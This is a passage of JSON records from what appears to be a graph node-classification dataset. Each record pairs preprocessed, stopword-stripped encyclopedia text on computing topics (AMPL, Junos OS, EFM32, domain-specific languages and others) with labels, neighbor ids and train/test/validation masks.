    "text": "AMPL:ampl mathematical programming language ampl algebraic modeling language describe solve high-complexity problems large-scale mathematical computing i.e. large-scale optimization scheduling-type problems developed robert fourer david gay brian kernighan bell laboratories ampl supports dozens solvers open source commercial software including cbc cplex fortmp gurobi minos ipopt snopt knitro lgo problems passed solvers nl files ampl used 100 corporate clients government agencies academic institutions one advantage ampl similarity syntax mathematical notation optimization problems allows concise readable definition problems domain optimization many modern solvers available neos server formerly hosted argonne national laboratory currently hosted university wisconsin madison accept ampl input according neos statistics ampl popular format representing mathematical programming problems ampl features mix declarative imperative programming styles formulating optimization models occurs via declarative language elements sets scalar multidimensional parameters decision variables objectives constraints allow concise description problems domain mathematical optimization procedures control flow statements available ampl support re-use simplify construction large-scale optimization problems ampl allows separation model data ampl supports wide range problem types among ampl invokes solver separate process advantages interaction solver done well-defined nl interface ampl available many popular 32- 64-bit operating systems including linux mac os x unix windows translator proprietary software maintained ampl optimization llc however several online services exist providing free modeling solving facilities using ampl free student version limited functionality free full-featured version academic courses also available ampl used within microsoft excel via solverstudio excel add-in ampl solver library asl allows reading nl files provides automatic differentiation open-source used many solvers implement ampl connection table present significant steps ampl history transportation problem george dantzig used provide sample ampl model problem finds least cost shipping schedule meets requirements markets supplies factories partial list solvers supported ampl",
    "neighbors": [
      9345,
      515,
      6797,
      1039,
      6160,
      10641,
      9376,
      7593,
      7983,
      8113,
      4019,
      823,
      6718,
      5830,
      329,
      4042,
      587,
      2901,
      9431,
      479,
      5347,
      5612,
      1133,
      5492,
      8057,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9916,
    "label": 7,
    "text": "Service-oriented_middleware:service-oriented middleware service-oriented middleware som aids distributed object middleware dom systems concept services service context number objects behavior objects use predefined interface make service available systems/services som defines communication protocols services provides location- migration-transparent access services thus supporting simple integration services beyond platform boundaries one example som sun oracle jini system called apache river project architectures belonging field web services also belong category middleware",
    "neighbors": [
      9665
    ],
    "mask": "Test"
  },
  {
    "node_id": 9917,
    "label": 3,
    "text": "Quarth:quarth besides arcade version also ports game msx2 built-in scc chip famicom game boy—home releases used quarth name worldwide exception game boy color release europe konami gb collection vol 2 game renamed generic title block game unknown reasons quarth released konami net i-mode service block quarth updated block quarth dx 2001 released without dx suffix 2005 made globally available konami net licensing many i-mode services offered mobile operators europe example available o2 uk o2 ireland telefónica spain 2005 konami also included game nintendo ds title emulated version game released 2006 playstation 2 japan part oretachi geasen zoku sono -series quarth combination tetris -style gameplay fixed shooter space invaders tradition player focus falling blocks action geometrical rather arranging blocks together make row disappearing blocks spaceship positioned bottom screen shoots blocks upwards make falling block pattern squares rectangles blocks arranged properly shape destroyed player awarded points based shape size blocks continue drop top screen various incomplete shapes level progresses blocks drop greater speed frequency also various power-ups could located increase ship speed among bonuses game continues blocks reach dotted line bottom screen whereupon player ship quarthed crushed flat like arcade games game featured multi-player mode arcade demonstrated via split screen player 1 left player 2 right game boy multiplayer required game boy link cable player able view fields game boys msx2 famicom versions two different 2-player modes mode players worked together game mode b arcade split-screen game generally acclaimed many online reviewers though nintendo life gave 6/10",
    "neighbors": [
      3075,
      10855,
      10316,
      9006,
      10931
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9918,
    "label": 0,
    "text": "Parse_Thicket:parse thicket parse thicket graph represents syntactic structure paragraph text natural language processing parse thicket includes parse tree sentence paragraph plus arcs relations words syntactic parse thickets constructed constituency parse trees dependency parse trees relations link parse trees within parse thicket assess similarity texts question candidate answers parse thickets generalized image parse thicket coreferences entity-entity links shown solid red rhetoric/speech act relations shown dotted red etap parser tree visualization software used compute generalization two parse thickets one needs find maximum common sub-graph sub-thicket",
    "neighbors": [
      7780
    ],
    "mask": "None"
  },
  {
    "node_id": 9919,
    "label": 2,
    "text": "Abnormal_end:abnormal end abend also ab normal end abend abnormal termination software program crash usage derives error message ibm os/360 ibm zos operating systems usually capitalized may appear abend common abend 0c7 data exception abend 0cb division zero abends could soft allowing automatic recovery hard terminating activity errors crashes novell netware network operating system usually called abends communities netware administrators sprung around internet abend.org term jocularly claimed derived german word abend meaning evening",
    "neighbors": [
      903,
      8551,
      2571,
      6319,
      5520,
      5744,
      3474,
      7795,
      5748,
      8852,
      11444,
      3450,
      3323,
      10333,
      1694,
      3615
    ],
    "mask": "Test"
  },
  {
    "node_id": 9920,
    "label": 3,
    "text": "VM2000:vm2000 vm 2000 hypervisor fujitsu formerly siemens nixdorf informationssysteme designed specifically use bs2000 operating system ebcdic-based operating system allows multiple images bs2000 linux operate s-series computer based ibm system/390 architecture also supports bs2000 linux microsoft windows x86-based sq-series mainframes additionally virtualize bs2000 guests sr- sx-series mainframes based mips sparc respectively",
    "neighbors": [
      7234,
      2179,
      36,
      9766,
      3431,
      1707,
      823,
      6797,
      7983,
      9137,
      3443,
      10837,
      1399,
      3323,
      10108,
      1503
    ],
    "mask": "None"
  },
  {
    "node_id": 9921,
    "label": 2,
    "text": "Application_binary_interface:application binary interface computer software application binary interface abi interface two binary program modules often one modules library operating system facility program run user abi defines data structures computational routines accessed machine code low-level hardware-dependent format contrast api defines access source code relatively high-level hardware-independent often human-readable format common aspect abi calling convention determines data provided input read output computational routines examples x86 calling conventions adhering abi may may officially standardized usually job compiler operating system library author however application programmer may deal abi directly writing program mix programming languages achieved using foreign function calls abis cover details complete abi intel binary compatibility standard ibcs allows program one operating system supporting abi run without modifications system provided necessary shared libraries present similar prerequisites fulfilled abis standardize details c++ name mangling exception propagation calling convention compilers platform require cross-platform compatibility embedded-application binary interface eabi specifies standard conventions file formats data types register usage stack frame organization function parameter passing embedded software program use embedded operating system compilers support eabi create object code compatible code generated compilers allowing developers link libraries generated one compiler object code generated another compiler developers writing assembly language code may also interface assembly generated compliant compiler eabis designed optimize performance within limited resources embedded system therefore eabis omit abstractions made kernel user code complex operating systems example dynamic linking avoided allow smaller executables faster loading fixed register usage allows compact stacks kernel calls running application privileged mode allows direct access custom hardware operation without indirection calling device driver widely used eabis include powerpc arm eabi2 mips eabi",
    "neighbors": [
      1922,
      6403,
      8966,
      6664,
      9353,
      3349,
      4887,
      3102,
      671,
      1952,
      7071,
      10145,
      1444,
      1445,
      6180,
      4264,
      3241,
      5165,
      7983,
      5040,
      2481,
      6268,
      435,
      2995,
      823,
      5432,
      825,
      3386,
      1724,
      10813,
      5824,
      10176,
      7234,
      6596,
      4424,
      585,
      5065,
      8012,
      10971,
      477,
      1632,
      868,
      8037,
      8680,
      5356,
      9964,
      1775,
      242,
      2804,
      8700,
      3577,
      8186,
      764,
      7421,
      5630
    ],
    "mask": "None"
  },
  {
    "node_id": 9922,
    "label": 4,
    "text": "Dasient:dasient dasient internet security company headquartered sunnyvale california founded 2008 launched first product june 2009 dasient acquired twitter january 2012 dasient provides cloud-based anti-malware services protecting businesses web-based malware malvertising dasient web malware analysis platform uses dynamic behavioral-based engine based sophisticated algorithms anomaly detection technology defend latest attacks using up-to-date intelligence malware platform includes system highly instrumented virtual machines simulate actual users would experience visiting particular web page viewing specific online ad company founded former google personnel neil daswani shariq rizvi former mckinsey strategy consultant ameet ranadive dasient named network world one ten startups watch 2010 company received seed funding mike maples ex-verisign ceo stratton sclavos ex-3com/palm chairman eric benhamou february 2011 announced google ventures invested dasient dasient acquired twitter january 2012",
    "neighbors": [
      7304,
      10602,
      10059,
      5072,
      7515,
      3485,
      7359
    ],
    "mask": "None"
  },
  {
    "node_id": 9923,
    "label": 2,
    "text": "Android_Beam:android beam android beam feature android mobile operating system allows data transferred via near field communication nfc allows rapid short-range exchange web bookmarks contact info directions youtube videos data android beam introduced 2011 android version 4.0 ice cream sandwich improved google acquired bump 2017 computerworld included android beam list once-trumpeted features quietly faded away observing despite admirable marketing effort beam never quite worked particularly well numerous systems sharing stuff proved simpler reliable android beam discontinued android q present second android q beta google pixel 3 android beam activated placing devices back back content shared displayed screen content able sent screen shrink display tap beam top tapping screen sends content one device sound play devices near able beam data sent confirmation tone play negative tone play failed content shrink screen indicating beaming complete sharing one direction device sending content get content receiving device activate android beam devices must support nfc near field communication enabled addition passing lock-screen logging android 4.1 jelly bean devices use android beam send photos videos bluetooth android beam uses nfc enable bluetooth devices instantly pair disable bluetooth complete automatically devices works android devices version 4.1 beaming specific content app allowed control content sent adding android beam support app specify data beaming app open receiving device receiving device app open application page play store beam refers extension android beam samsung first used galaxy iii phones uses near-field communication establish wi-fi direct connection two devices data transfer instead bluetooth connection results faster transfer speeds devices feature beam beam limited devices beam support wi-fi direct nfc htc one samsung galaxy iii external links google play story nfc basics",
    "neighbors": [
      5892,
      7722,
      9610,
      1074,
      8413
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9924,
    "label": 4,
    "text": "SSH_Communications_Security:ssh communications security ssh communications security oyj cybersecurity company focusing encryption access control according company products secure privileged access management credentials ssh keys server passwords data-in-transit focus particularly ssh key management one products company privx on-demand access manager aimed securing machine-to-machine communication large organizations replacing permanent access keys customers include many major financial institutions retailers technology companies company founded 1995 tatu ylönen designed first version secure shell ssh protocol software parts still today included openssh continues work company full-time current ceo kaisa olkkonen company listed nasdaq nordic since 2000",
    "neighbors": [
      7364,
      10341,
      10631,
      2932,
      11357,
      7327
    ],
    "mask": "None"
  },
  {
    "node_id": 9925,
    "label": 4,
    "text": "Bup:bup bup backup system written python uses several formats git capable handling large files like operating system images block-based deduplication optional par2-based error correction bup development began 2010 accepted debian year bup uses git packfile format writing packfiles directly avoiding garbage collection bup available source notably part following distributions",
    "neighbors": [
      2304,
      9025,
      6280,
      8554,
      1358,
      7983,
      823,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9926,
    "label": 9,
    "text": "Domain-specific_language:domain-specific language domain-specific language dsl computer language specialized particular application domain contrast general-purpose language gpl broadly applicable across domains wide variety dsls ranging widely used languages common domains html web pages languages used one pieces software mush soft code dsls subdivided kind language include domain-specific markup languages domain-specific modeling languages generally specification languages domain-specific programming languages special-purpose computer languages always existed computer age term domain-specific language become popular due rise domain-specific modeling simpler dsls particularly ones used single application sometimes informally called mini-languages line general-purpose languages domain-specific languages always sharp language may specialized features particular domain applicable broadly conversely may principle capable broad application practice used primarily specific domain example perl originally developed text-processing glue language domain awk shell scripts mostly used general-purpose programming language later contrast postscript turing complete language principle used task practice narrowly used page description language design use appropriate dsls key part domain engineering using language suitable domain hand – may consist using existing dsl gpl developing new dsl language-oriented programming considers creation special-purpose languages expressing problems standard part problem-solving process creating domain-specific language software support rather reusing existing language worthwhile language allows particular type problem solution expressed clearly existing language would allow type problem question reappears sufficiently often pragmatically dsl may specialized particular problem domain particular problem representation technique particular solution technique aspects domain domain-specific language created specifically solve problems particular domain intended able solve problems outside although may technically possible contrast general-purpose languages created solve problems many domains domain also business area examples business areas include domain-specific language somewhere tiny programming language scripting language often used way analogous programming library boundaries concepts quite blurry much like boundary scripting languages general-purpose languages domain-specific languages languages often declared syntaxes grammars specific goals design implementation domain-specific language one visual diagramming language created generic eclipse modeling system programmatic abstractions eclipse modeling framework textual languages instance command line utility grep regular expression syntax matches patterns lines text sed utility defines syntax matching replacing regular expressions often tiny languages used together inside shell perform complex programming tasks line domain-specific languages scripting languages somewhat blurred domain-specific languages often lack low-level functions filesystem access interprocess control functions characterize full-featured programming languages scripting otherwise many domain-specific languages compile byte-code executable code various kinds media objects graphviz exports postscript gif jpeg etc. csound compiles audio files ray-tracing domain-specific language like pov compiles graphics files computer language like sql presents interesting case deemed domain-specific language specific specific domain sql case accessing managing relational databases often called another application sql keywords functions many scripting languages often thought language right perhaps prevalence database manipulation programming amount mastery required expert language blurring line many domain-specific languages exposed apis accessed programming languages without breaking flow execution calling separate process thus operate programming libraries domain-specific languages expand time include full-featured programming tools complicates question whether language domain-specific good example functional language xslt specifically designed transforming one xml graph another extended since inception allow particularly 2.0 version various forms filesystem interaction string date manipulation data typing model-driven engineering many examples domain-specific languages may found like ocl language decorating models assertions qvt domain-specific transformation language however languages like uml typically general-purpose modeling languages summarize analogy might useful little language like knife used thousands different ways cutting food cutting trees domain-specific language like electric drill powerful tool wide variety uses specific context namely putting holes things general purpose language complete workbench variety tools intended performing variety tasks domain-specific languages used programmers looking current workbench realize need better drill find particular domain-specific language provides exactly dsls implemented via independent interpreter compiler known external domain specific languages well known examples include latex awk separate category known embedded internal domain specific languages typically implemented within host language library tend limited syntax host language though depends host language capabilities several usage patterns domain-specific languages many domain-specific languages used one way dsl code embedded host language may special syntax support regexes sed awk perl javascript may passed strings adopting domain-specific language approach software engineering involves risks opportunities well-designed domain-specific language manages find proper balance domain-specific languages important design goals contrast general-purpose languages programming idioms methods imposed programmers handle common development tasks e.g general purpose programming languages rarely support idioms domain-specific languages describe e.g examples domain-specific languages include html logo pencil-like drawing verilog vhdl hardware description languages matlab gnu octave matrix programming mathematica maple maxima symbolic mathematics specification description language reactive distributed systems spreadsheet formulas macros sql relational database queries yacc grammars creating parsers regular expressions specifying lexers generic eclipse modeling system creating diagramming languages csound sound music synthesis input languages graphviz grgen software packages used graph layout graph rewriting gml scripting language used gamemaker studio domain-specific language targeted novice programmers easily able learn programming language serves blend multiple languages including delphi c++ basic lack structures data types features full-fledged programming language many built-in functions sandboxed purpose easy portability language primarily serves make easy anyone pick language develop game unix shell scripts give good example domain-specific language data organization manipulate data files user input many different ways domain abstractions notations include streams stdin stdout operations streams redirection pipe abstractions combine make robust language describe flow organization data language consists simple interface script running controlling processes perform small tasks tasks represent idioms organizing data desired format tables graphs charts etc tasks consist simple control-flow string manipulation mechanisms cover lot common usages like searching replacing string files counting occurrences strings frequency counting even though unix scripting languages turing complete differ general purpose languages practice scripting languages used weave together small unix tools grep ls sort wc coldfusion associated scripting language another example domain-specific language data-driven websites scripting language used weave together languages services java .net c++ sms email email servers http ftp exchange directory services file systems use websites coldfusion markup language cfml includes set tags used coldfusion pages interact data sources manipulate data display output cfml tag syntax similar html element syntax erlang open telecom platform originally designed use inside ericsson domain-specific language language offers platform libraries create finite state machines generic servers event managers quickly allow engineer deploy applications support libraries shown industry benchmarks outperform languages intended mixed set domains c c++ language officially open source downloaded website filtermeister programming environment programming language based c specific purpose creating photoshop-compatible image processing filter plug-ins filtermeister runs photoshop plug-in load execute scripts compile export independent plug-ins although filtermeister language reproduces significant portion c language function library contains features used within context photoshop plug-ins adds number specific features useful specific domain template feature mediawiki embedded domain-specific language whose fundamental purpose support creation inclusion reference mediawiki pages mediawiki pages much interest domain-specific languages improve productivity quality software engineering domain-specific language could possibly provide robust set tools efficient software engineering tools beginning make way development critical software systems software cost reduction toolkit example toolkit suite utilities including specification editor create requirements specification dependency graph browser display variable dependencies consistency checker catch missing cases well-formed formulas specification model checker theorem prover check program properties specification invariant generator automatically constructs invariants based requirements newer development language-oriented programming integrated software engineering methodology based mainly creating optimizing using domain-specific languages complementing language-oriented programming well forms domain-specific languages class compiler writing tools called metacompilers metacompiler useful generating parsers code generators domain-specific languages metacompiler compiles domain-specific metalanguage specifically designed domain metaprogramming besides parsing domain-specific languages metacompilers useful generating wide range software engineering analysis tools meta-compiler methodology often found program transformation systems metacompilers played significant role computer science computer industry include meta-ii descendant treemeta unreal unreal tournament unveiled language called unrealscript allowed rapid development modifications compared competitor quake using id tech 2 engine id tech engine used standard c code meaning c learned properly applied unrealscript optimized ease use efficiency similarly development recent games introduced specific languages one common example lua scripting various business rules engines developed automating policy business rules used government private industry ilog oracle policy automation dtrules drools others provide support dsls aimed support various problem domains dtrules goes far define interface use multiple dsls within rule set purpose business rules engines define representation business logic human-readable fashion possible allows subject matter experts developers work understand representation business logic rules engines provide approach simplifying control structures business logic example using declarative rules decision tables coupled alternatives programming syntax favor dsls statistical modelers developed domain-specific languages bugs jags stan languages provide syntax describing bayesian model generate method solving using simulation generate object handling services based interface description language domain-specific language javascript web applications html documentation c++ high-performance code etc done cross-language frameworks apache thrift google protocol buffers gherkin language designed define test cases check behavior software without specifying behavior implemented meant read used non-technical users using natural language syntax line-oriented design tests defined gherkin must implemented general programming language steps gherkin program acts syntax method invocation accessible non-developers prominent examples domain-specific languages include advantages disadvantages",
    "neighbors": [
      515,
      5635,
      9735,
      9224,
      16,
      1552,
      6161,
      5651,
      1051,
      3613,
      6182,
      5165,
      4656,
      5680,
      9780,
      1591,
      8763,
      6717,
      10819,
      7749,
      8262,
      1095,
      5703,
      9286,
      9299,
      3159,
      3675,
      2140,
      7777,
      7780,
      11367,
      4200,
      6249,
      2666,
      8810,
      5228,
      3698,
      9330,
      9331,
      119,
      2680,
      3705,
      8825,
      5245,
      3712,
      9345,
      2691,
      5774,
      10387,
      3221,
      6810,
      10909,
      7326,
      159,
      4770,
      4777,
      9385,
      10413,
      4782,
      7357,
      191,
      2751,
      7872,
      9932,
      7373,
      11474,
      9940,
      5845,
      219,
      731,
      11487,
      10465,
      7395,
      4838,
      1768,
      4840,
      10474,
      8188,
      8430,
      9454,
      2804,
      2294,
      3832,
      5880,
      5373,
      7421,
      4354,
      6406,
      1801,
      11023,
      5395,
      5404,
      3869,
      7983,
      6962,
      4410,
      10042,
      8000,
      4423,
      2901,
      1890,
      6502,
      872,
      363,
      4980,
      5492,
      11125,
      2432,
      6016,
      8582,
      9616,
      7571,
      3988,
      5527,
      6552,
      9626,
      4507,
      6555,
      10142,
      10658,
      939,
      10672,
      8628,
      6581,
      5048,
      6585,
      6074,
      8122,
      5053,
      6594,
      1480,
      3529,
      4042,
      2000,
      5585,
      9688,
      2009,
      5081,
      11227,
      477,
      2537,
      9710,
      9714,
      10228,
      502,
      2556,
      2045,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9927,
    "label": 2,
    "text": "Junos_OS:junos os junos os formally juniper network operating system freebsd-based operating system used juniper networks hardware routers operating system used juniper routing switching security devices juniper offers software development kit sdk partners customers allow additional customization biggest competitor junos cisco systems ios junos os formerly branded juniper junos commonly referred simply junos though general brand name juniper networks including product lines junos fusion key benefits junos os include junos provides single code base across juniper platforms juniper issued new release junos every 90 days since 1998 junos supports variety routing protocols introduction srx j-series past version 9.3 platforms also supports flow mode includes stateful firewalling nat ipsec flexible routing policy language used controlling route advertisements path selection junos generally adheres industry standards routing mpls operating system supports high availability mechanisms standard unix graceful restart junos operating system primarily based linux freebsd linux running bare metal freebsd running qemu virtual machine freebsd unix implementation customers access unix shell execute normal unix commands junos runs juniper hardware systems juniper acquired netscreen integrated screenos security functions junos network operating system junos cli text-based command interface configuring troubleshooting monitoring juniper device network traffic associated supports two types command modes functions operational mode include control cli environment monitoring hardware status display information network data passes though hardware configuration mode used configuring juniper router switch security device adding deleting modifying statements configuration hierarchy juniper developer network jdn juniper networks provides junos sdk customers 3rd-party developers want develop applications junos-powered devices juniper networks routers switches service gateway systems provides set tools application programming interfaces apis including interfaces junos routing firewall filter ui traffic services functions juniper networks also employs junos sdk internally develop parts junos many junos applications openflow junos traffic services 2016 juniper maintains market share ethernet switching 16.9 market share enterprise routing 16.1 juniper generated 2,353 million revenue routing 858 million switching 318 million security 2016 juniper revenue stems americas 2,969 million europe middle east africa 1,238 million asia 783 million combining rest annual revenue 2016",
    "neighbors": [
      4611,
      10761,
      2061,
      9743,
      6675,
      8725,
      4636,
      10291,
      1080,
      5177,
      6207,
      9279,
      3651,
      7748,
      8266,
      7249,
      9306,
      607,
      5220,
      1126,
      9320,
      9844,
      11383,
      633,
      8316,
      9343,
      10883,
      6276,
      2181,
      4745,
      9366,
      7319,
      2201,
      3742,
      2212,
      3752,
      684,
      6834,
      1718,
      5819,
      10433,
      11459,
      10436,
      1221,
      9927,
      5322,
      8395,
      10451,
      10455,
      6361,
      1253,
      9452,
      10482,
      1273,
      2825,
      274,
      1814,
      10016,
      1316,
      10535,
      4908,
      3885,
      10030,
      1839,
      7983,
      11573,
      823,
      321,
      10561,
      5959,
      6985,
      11086,
      6481,
      850,
      341,
      9048,
      6491,
      10590,
      7521,
      1891,
      873,
      7027,
      5492,
      2421,
      2424,
      7552,
      5506,
      1927,
      9625,
      1946,
      9628,
      5534,
      11698,
      9151,
      9153,
      9162,
      10202,
      3551,
      6624,
      5603,
      998,
      4073,
      9201,
      3058,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 9928,
    "label": 3,
    "text": "EFM32:efm32 efm32 gecko mcus family energy-friendly mixed-signal 32-bit microcontroller integrated circuits energy micro silicon labs based arm cortex-m cpus including cortex-m0+ cortex-m3 cortex-m4 efm32 microcontrollers majority functionality available deep sleep modes sub-microamp current consumption enabling energy efficient autonomous behavior cpu sleeping efm32 combines quick wakeups efficient processing reduce impact cpu code needs executed good example deep sleep peripheral efm32 low energy sensor interface lesense capable duty-cycling inductive capacitive resistive sensors autonomously operating deep sleep mode another important aspect gecko mcus peripherals direct connection allowing communicate without cpu wake intervention interconnect known peripheral reflex system prs significant functionality available lower stop shutoff energy modes stop mode includes analog comparators watchdog timers pulse counters ic links external interrupts shutoff mode 20–100 na current consumption depending product applications access gpio reset real-time counter rtc retention memory efm32 family consists number sub-families ranging efm32 zero gecko based arm cortex-m0+ higher performing efm32 giant gecko wonder gecko based cortex-m3 cortex-m4 respectively efm32 technology also foundation efr32 wireless geckos portfolio sub-ghz 2.4 ghz wireless system chip soc devices product families important advantage efm32 mcu portfolio energy efficiency energy efficiency stems autonomous operations deep sleep modes low active sleep currents fast wakeup times together characteristics reduce integrated energy power time lifetime application efm32 devices also constructed reduce development cycles variety products smart metering industrial applications pin/software compatible scalable across wide application requirements compatible multiple development platforms additionally mcu architecture common fundamental piece wireless gecko portfolio efr32 software hardware pin/package compatibility efm32 products offer simplified pathway wireless applications efm32 mcu family critical features useful iot applications major architectural features low-energy modes design peripheral reflex system prs gives developers peripheral interconnect system eight triggers handle task execution without cpu intervention low level mcu broken eight categories core memory clock management energy management serial interfaces i/o ports timers triggers analog interfaces security modules terms core cpu efm32 mcus integrate arm cortex-m series technology spanning cortex-m0+ cortex-m4 enable gecko mcu operation take advantage ultralow power architecture applications operate main input clock rate 4 mhz 48 mhz reduce need external electronic components efm32 integrates low frequency ultralow frequency clocks well mcus also integrate internal voltage regulators simplified compact system designs addition cpu clock rate flexibility specific applications efm32 portfolio offers broad range memory resource options application storage flash application execution ram needs rtos implementation devices include internal flash memory low 4 kb high 1024 kb ram low 2 kb high 128 kb enable applications sense control communicate single low-power microcontroller efm32 mcus contain complete analog digital interfaces serial digital interfaces include usart low energy uart i2c usb timer triggers block mcu includes cryotimer low energy pulse counter pcnt backup real-time-counter rtc analog modules include adcs dacs operational amplifiers analog comparators applications demand heightened security protections efm32 mcus offer various hardware crypto engines cyclic redundancy check crc general i/o mcus feature 93 gpio pins several variants feature lcd controllers quickly design develop build test efm32 applications developers various resources available free integrated development environment ide performance analysis tools configuration tools utilities flexible compilers development platforms software stacks reference code design examples app notes training videos whitepapers silicon labs simplicity studio free eclipse-based development platform graphical configuration tools energy-profiling tools wireless network analysis tools demos software examples documentation technical support community forums also includes flexible compiler tool options including gcc arm keil iar embedded workbench third-party tools two popular development tools within simplicity studio ide advanced energy monitor aem network debugger called “ packet trace ” advanced energy monitor efm32 tool allows developers energy profiling application running also allows direct code correlation optimize hardware design software network debugger tool allows developers using wireless gecko mcus trace network traffic packets throughout nodes network efm32 supported multiple third-party real-time operating system rtos software libraries drivers stacks rtos solutions enabled efm32s micro-controller operating systems uc/os micrium freertos gnu chopstx embos segger mbed os arm october 2016 silicon labs acquired micrium addition iot-critical middleware stacks tcp/ip micrium provides certified commercial-grade rtos enables embedded iot designs handle task management real time important mcu applications even essential wireless applications example projects found micrium website efm32 starter kits available evaluation purposes gain familiarity portfolio starter kit contains sensors peripherals help illustrate device capabilities well serve starting point application development using simplicity studio software also grants access kit information ability program starter kit demos code examples starter kits contain eeprom board ids enable automated setup kit connected simplicity studio ide efm32 kits arm mbed-enabled kits support arm mbed right box supported simplicity studio development tools community forums featuring giant gecko mcu 1024 kb flash 93 gpio efm32 giant gecko starter kit shown one latest starter kit offerings efm32 family efm32 starter kits include efm32 designed achieve high degree autonomous operation low-energy modes multiple ultralow energy modes available turning energy usage significantly reducing power consumption achieve power energy-efficiency features efm32 products utilize ultralow active idle power fast wakeup processing times important ability intelligently interact peripherals sensors autonomously without waking cpu consuming power active run mode efm32 consumes 114 µa/mhz running real-life code 32 mhz 3v supply also mode process time matters one main benefits 32-bit mcu working power consumption however maximum clock speed silicon labs carefully designs efm32s optimize performance low power together designing maximum clock speed 48 mhz mcus faster clocks 100 mhz+ range inevitably consume power active mode beyond energy savings run mode efm32 ideal low duty cycle applications take advantage operating lower energy states lower energy states outlined section em1 sleep em2 deep sleep em3 stop em4 shutoff autonomous peripherals peripheral reflex system lesense core technologies come play lower energy modes autonomous peripheral feature ensures peripheral devices operate without waking cpu also extensive direct memory address dma support 16 channels depending efm32 peripheral reflex system boosts capability autonomous peripherals allowing flexible configuration create complex powerful interconnections bypass cpu lesense unique efm32 feature allows mcu monitor 16 sensors deep sleep mode efm32 resistive sensing capacitive sensing inductive sensing mode needed efm32 wake deep sleep engage cpu less two microseconds adc sensing applications temperature demonstration wonder gecko mcu standard temperature thermistor setting adc sample thermistor every second 1 hz rate equates 1.3 ua average current real world would equate 220 ma-hr cr2032 coin cell battery lasting close 20 years application could implemented lesense preset thresholds instead using regular time interval adc samples case lesense irregular triggers threshold trigger rate 1 hz would still produce average current 1.5 ua equates 16.85-year battery life low-energy pulse counter metrology using low energy pulse counter efm32 could also used pulsed sensing applications example magnetic hall effect sensor efm32 convert rotational position quantified speed flow rate common situation water heat flow metering efm32 used stop mode em3 count pulses calculate flow operating power consumption state could low 650 na 3vdc significant positive implications battery-operated meters efm32 microcontroller family one two products energy micro efr4d draco soc radios gecko mbed compiler available https //developer.mbed.org/compiler/ nav",
    "neighbors": [
      7170,
      11395,
      3467,
      6925,
      10767,
      8720,
      1170,
      7445,
      9366,
      666,
      5786,
      4508,
      9371,
      4773,
      38,
      9638,
      682,
      4139,
      2862,
      11054,
      2224,
      11314,
      7604,
      11447,
      9913,
      8253,
      5823,
      6207,
      8383,
      7234,
      7235,
      9155,
      10945,
      2635,
      5963,
      9163,
      6607,
      7631,
      5457,
      2517,
      4821,
      9685,
      4569,
      2524,
      6495,
      1377,
      2788,
      7269,
      3050,
      9964,
      11374,
      6001,
      7281,
      8700,
      2814
    ],
    "mask": "Train"
  },
  {
    "node_id": 9929,
    "label": 4,
    "text": "User_activity_monitoring:user activity monitoring field information security user activity monitoring uam monitoring recording user actions uam captures user actions including use applications windows opened system commands executed checkboxes clicked text entered/edited urls visited nearly every on-screen event protect data ensuring employees contractors staying within assigned tasks posing risk organization user activity monitoring software deliver video-like playback user activity process videos user activity logs keep step-by-step records user actions searched analyzed investigate out-of-scope activities need uam rose due increase security incidents directly indirectly involve user credentials exposing company information sensitive files 2014 761 data breaches united states resulting 83 million exposed customer employee records 76 breaches resulting weak exploited user credentials uam become significant component infrastructure main populations users uam aims mitigate risks contractors used organizations complete information technology operational tasks remote vendors access company data risks even malicious intent external user like contractor major security liability 70 regular business users admitted access data necessary generalized accounts give regular business users access classified company data makes insider threats reality business uses generalized accounts administrator accounts heavily monitored due high profile nature access however current log tools generate “ log fatigue ” admin accounts log fatigue overwhelming sensation trying handle vast amount logs account result many user actions harmful user actions easily overlooked thousands user actions compiled every day according verizon data breach incident report “ first step protecting data knowing access it. ” today ’ environment “ lack oversight control among employees access confidential sensitive information. ” apparent gap one many factors resulted major number security issues companies companies use uam usually separate necessary aspects uam three major components visual forensics involves creating visual summary potentially hazardous user activity user action logged recorded user session completed uam created written record visual record whether screen-captures video exactly user done written record differs siem logging tool captures data user-level system level –providing plain english logs rather syslogs originally created debugging purposes textual logs paired corresponding screen-captures video summaries using corresponding logs images visual forensics component uam allows organizations search exact user actions case security incident case security threat i.e data breach visual forensics used show exactly user everything leading incident visual forensics also used provide evidence law enforcement investigate intrusion user activity alerting serves purpose notifying whoever operates uam solution mishap misstep concerning company information real-time alerting enables console administrator notified moment error intrusion occurs alerts aggregated user provide user risk profile threat ranking alerting customizable based combinations users actions time location access method alerts triggered simply opening application entering certain keyword web address alerts also customized based user actions within application deleting creating user executing specific commands user behavior analytics add additional layer protection help security professionals keep eye weakest link chain monitoring user behavior help dedicated software analyzes exactly user session security professionals attach risk factor specific users and/or groups immediately alerted red flag warning high-risk user something interpreted high-risk action exporting confidential customer information performing large database queries scope role accessing resources ’ accessing forth uam collects user data recording activity every user applications web pages internal systems databases uam spans access levels access strategies rdp ssh telnet ica direct console login etc.… uam solutions pair citrix vmware environments uam solutions transcribe documented activities user activity logs uam logs match video-playbacks concurrent actions examples items logged names applications run titles pages opened urls text typed edited copied/pasted commands scripts uam uses screen-recording technology captures individual user actions video-like playback saved accompanied user activity log playbacks differ traditional video playback screen scraping compiling sequential screen shots video like replay user activity logs combined video-like playback provides searchable summary user actions enables companies read also view exactly particular user company systems companies employees raised issue user privacy aspect uam believe employees resist idea actions monitored even done security purposes reality uam strategies address concerns possible monitor every single user action purpose uam systems snoop employee browsing history uam solutions use policy-based activity recording enables console administrator program exactly ’ monitored many regulations require certain level uam others require logs activity audit purposes uam meets variety regulatory compliance requirements hipaa iso 27001 sox pci etc.… uam typically implemented purpose audits compliance serve way companies make audits easier efficient audit information request information user activity met uam unlike normal log siem tools uam help speed audit process building controls necessary navigate increasingly complex regulatory environment ability replay user actions provides support determining impact regulated information security incident response uam two deployment models appliance-based monitoring approaches use dedicated hardware conduct monitoring looking network traffic software-based monitoring approaches use software agents installed nodes accessed users commonly software requires installation agent systems servers desktops vdi servers terminal servers across users want monitor agents capture user activity reports information back central console storage analysis solutions may quickly deployed phased manner targeting high-risk users systems sensitive information first allowing organization get running quickly expand new user populations business requires",
    "neighbors": [
      1251,
      1829,
      10245,
      2901,
      5722,
      5371,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 9930,
    "label": 2,
